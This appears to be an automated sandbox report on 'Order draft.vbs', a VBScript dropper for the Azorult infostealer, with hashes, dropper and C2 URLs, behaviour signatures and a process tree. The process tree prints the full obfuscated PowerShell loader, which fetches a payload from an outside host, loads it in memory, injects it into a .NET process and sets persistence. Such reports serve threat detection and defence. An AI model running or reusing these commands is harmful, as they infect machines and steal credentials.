Overview

overview

10

Static

static

1

Order draft.vbs

windows7-x64

10

Order draft.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    95s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2024 06:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Order draft.vbs

  • Size

    504KB

  • MD5

    581a2142bc26026893bbdfab4e65f694

  • SHA1

    e5b3a5977750cd34a69e908bf22893f153b9301f

  • SHA256

    e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1

  • SHA512

    5f74d6b90e9791f7c403690126fdd4f0bfcfde9dcd099d1ef0adb72d8f94b89ed1e9f708eaf2e853da1a681cbf3695e0421191f52902870dfbcedad5b9ff8808

  • SSDEEP

    12288:u9M/PycpcyDgDy8f1xLWFIZni8itFw9UPpVaElOOywO5lowt4sG50v8eKjDo6c5l:S0ifJtH

Score
10/10
azorultcollectioncredential_accessdiscoveryexecutioninfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

azorult

C2

http://mg5n.shop/ML341/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order draft.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9JysndXJsID0nKycgeycrJzJ9aHQnKyd0JysncHM6JysnLycrJy8nKydpYTYwJysnMDEnKycwMC4nKyd1cy5hJysncicrJ2NoaXZlLicrJ29yZy8yNC8nKydpdGVtcy8nKydkZXRhaC1ub3RlLXYvRGV0YWhOb3QnKydlVi4nKyd0eHR7Mn0nKyc7eycrJzB9YmEnKydzZTY0QycrJ29udCcrJ2VuJysndCcrJyA9JysnIChOZScrJ3ctJysnTycrJ2InKydqZWN0JysnIFN5cycrJ3RlbS4nKydOZXQuV2ViQ2wnKydpJysnZW4nKyd0JysnKS4nKydEb3dubG8nKydhZFN0cicrJ2luZygnKyd7MH11JysncicrJ2wpJysnO3swfWJpJysnbmFyeUNvbnQnKydlJysnbnQgJysnPSAnKydbU3knKydzdCcrJ2UnKydtJysnLicrJ0NvbnZlcnQnKyddOicrJzpGcicrJ29tQmEnKydzZScrJzYnKyc0JysnU3QnKydyaW4nKydnKHswfScrJ2Jhc2U2JysnNENvJysnbnQnKydlbnQpJysnOycrJ3swfScrJ2EnKydzJysnc2VtJysnYmx5ID0gW1InKydlJysnZicrJ2xlYycrJ3RpJysnbycrJ24uJysnQScrJ3NzZW1ibHldOjpMb2FkKHswJysnfWJpbmFyeUNvbnRlbnQnKycpOycrJ3swJysnfXQnKyd5JysncGUgJysnPSB7MH1hcycrJ3NlJysnbWJseS5HJysnZScrJ3QnKydUeXBlKHsyJysnfVJ1blBFLicrJ0hvJysnbWV7Mn0nKycpJysnOycrJ3swfW1ldGhvJysnZCAnKyc9ICcrJ3swfXQnKyd5cGUuR2V0TScrJ2V0aCcrJ29kKHsyfVZBJysnSXsyfScrJyknKyc7eycrJzB9bWV0JysnaCcrJ29kLkludm9rZScrJyh7JysnMH1udWwnKydsLCAnKydbb2JqZWN0W10nKyddQCh7Mn0nKyc3NWViMjA5YzU0ZDYtY2E3JysnOCcrJy1hM2I0LTMnKyc1ZDctMDE3ZGJjJysnNWMnKyc9bmUnKydrJysnb3QmYScrJ2lkZScrJ209JysndCcrJ2wnKydhJysnP3QnKyd4dCcrJy5lJysnc2FiJysnL28nKycvbScrJ29jJysnLicrJ3RvcHNwJysncGEnKycuMycrJzJlMycrJzUnKycteXRpYy0nKydyZScrJ2J5Yy8nKydiJysnLycrJzB2L21vYy5zaXBhZWwnKydnb29nJysnLmVnJysnYScrJ3InKydvdHMnKydlJysnc2FiJysnZXJpJysnZicrJy8nKycvJysnOnMnKydwdHRoJysnezJ9ICwgJysnezJ9MXsyfScrJyAsJysnIHsyfUMnKyc6ezF9UCcrJ3InKydvZ3JhJysnbScrJ0QnKydhdCcrJ2F7MX17JysnMn0gLCcrJyB7JysnMicrJ31hcmFuZW9ncicrJ2FmaWF7JysnMn0sezJ9QWRkJysnSW5Qcm9jZScrJ3NzMzJ7Mn0nKycsezJ9eycrJzInKyd9KSknKSAgLUYgW0NIYXJdMzYsW0NIYXJdOTIsW0NIYXJdMzkpfCAmKCAkRW5WOmNvbXNQZWNbNCwyNCwyNV0tak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'url ='+' {'+'2}ht'+'t'+'ps:'+'/'+'/'+'ia60'+'01'+'00.'+'us.a'+'r'+'chive.'+'org/24/'+'items/'+'detah-note-v/DetahNot'+'eV.'+'txt{2}'+';{'+'0}ba'+'se64C'+'ont'+'en'+'t'+' ='+' (Ne'+'w-'+'O'+'b'+'ject'+' Sys'+'tem.'+'Net.WebCl'+'i'+'en'+'t'+').'+'Downlo'+'adStr'+'ing('+'{0}u'+'r'+'l)'+';{0}bi'+'naryCont'+'e'+'nt '+'= '+'[Sy'+'st'+'e'+'m'+'.'+'Convert'+']:'+':Fr'+'omBa'+'se'+'6'+'4'+'St'+'rin'+'g({0}'+'base6'+'4Co'+'nt'+'ent)'+';'+'{0}'+'a'+'s'+'sem'+'bly = [R'+'e'+'f'+'lec'+'ti'+'o'+'n.'+'A'+'ssembly]::Load({0'+'}binaryContent'+');'+'{0'+'}t'+'y'+'pe '+'= {0}as'+'se'+'mbly.G'+'e'+'t'+'Type({2'+'}RunPE.'+'Ho'+'me{2}'+')'+';'+'{0}metho'+'d '+'= '+'{0}t'+'ype.GetM'+'eth'+'od({2}VA'+'I{2}'+')'+';{'+'0}met'+'h'+'od.Invoke'+'({'+'0}nul'+'l, '+'[object[]'+']@({2}'+'75eb209c54d6-ca7'+'8'+'-a3b4-3'+'5d7-017dbc'+'5c'+'=ne'+'k'+'ot&a'+'ide'+'m='+'t'+'l'+'a'+'?t'+'xt'+'.e'+'sab'+'/o'+'/m'+'oc'+'.'+'topsp'+'pa'+'.3'+'2e3'+'5'+'-ytic-'+'re'+'byc/'+'b'+'/'+'0v/moc.sipael'+'goog'+'.eg'+'a'+'r'+'ots'+'e'+'sab'+'eri'+'f'+'/'+'/'+':s'+'ptth'+'{2} , '+'{2}1{2}'+' ,'+' {2}C'+':{1}P'+'r'+'ogra'+'m'+'D'+'at'+'a{1}{'+'2} ,'+' {'+'2'+'}araneogr'+'afia{'+'2},{2}Add'+'InProce'+'ss32{2}'+',{2}{'+'2'+'}))') -F [CHar]36,[CHar]92,[CHar]39)| &( $EnV:comsPec[4,24,25]-jOIn'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\araneografia.vbs"
          4⤵
            PID:2296
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • Loads dropped DLL
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • outlook_office_path
            • outlook_win_path
            PID:1712

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\061CA707\mozglue.dll
      Filesize

      135KB

      MD5

      9e682f1eb98a9d41468fc3e50f907635

      SHA1

      85e0ceca36f657ddf6547aa0744f0855a27527ee

      SHA256

      830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

      SHA512

      230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\061CA707\msvcp140.dll
      Filesize

      429KB

      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\061CA707\nss3.dll
      Filesize

      1.2MB

      MD5

      556ea09421a0f74d31c4c0a89a70dc23

      SHA1

      f739ba9b548ee64b13eb434a3130406d23f836e3

      SHA256

      f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

      SHA512

      2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\061CA707\vcruntime140.dll
      Filesize

      81KB

      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_px5cy2gq.k4x.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1712-30-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1712-24-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1836-22-0x0000020F45470000-0x0000020F4567C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/1968-0-0x00007FFA2FD73000-0x00007FFA2FD75000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1968-31-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1968-12-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1968-11-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1968-6-0x000001C10A300000-0x000001C10A322000-memory.dmp

      Filesize

      136KB

      Download